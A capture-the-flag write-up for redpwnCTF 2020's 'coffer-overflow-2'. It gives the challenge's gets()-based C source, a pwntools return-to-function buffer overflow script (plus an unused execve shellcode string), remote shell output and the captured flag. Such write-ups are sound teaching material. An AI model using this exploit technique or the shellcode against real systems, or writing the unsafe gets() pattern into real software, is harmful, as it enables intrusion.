# (solved) pwn/coffer-overflow-2 You'll have to jump to a function now!? nc 2020.redpwnc.tf 31908 ``` https://redpwn.storage.googleapis.com/uploads/3300eb3f45e5ba0d0fe0d43d64d26d5deac9171cd85f986dd28dc3d07edb8c70/coffer-overflow-2.c https://redpwn.storage.googleapis.com/uploads/336d9543aa8f844cf2aa918631094bb01f97e86b75fd7dc30cf822246e2873a2/coffer-overflow-2 ``` ```c #include <stdio.h> #include <string.h> int main(void) { char name[16]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); puts("Welcome to coffer overflow, where our coffers are overfilling with bytes ;)"); puts("What do you want to fill your coffer with?"); gets(name); } void binFunction() { system("/bin/sh"); } ``` Address binFunction() is 00000000004006e6 ``` objdump -D -M intel coffer-overflow-2|grep binFunction 00000000004006e6 <binFunction>: ``` Exploit script ```python #!/usr/bin/python3 from time import sleep from pwn import * shell = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05" r = remote('2020.redpwnc.tf', 31908) #r = process('./coffer-overflow-2') print(r.recvline()) print(r.recvuntil('What do you want to fill your coffer with?')) r.sendline(b"B"*24 + b"\xe6\x06\x40\x00\x00\x00\x00\x00") r.interactive() ``` output ```bash # ./doit.py [+] Opening connection to 2020.redpwnc.tf on port 31908: Done b'Welcome to coffer overflow, where our coffers are overfilling with bytes ;)\n' b'What do you want to fill your coffer with?' [*] Switching to interactive mode $ ls Makefile bin coffer-overflow-2 coffer-overflow-2.c dev flag.txt lib lib32 lib64 $ cat flag.txt flag{ret_to_b1n_m0re_l1k3_r3t_t0_w1n} $ ```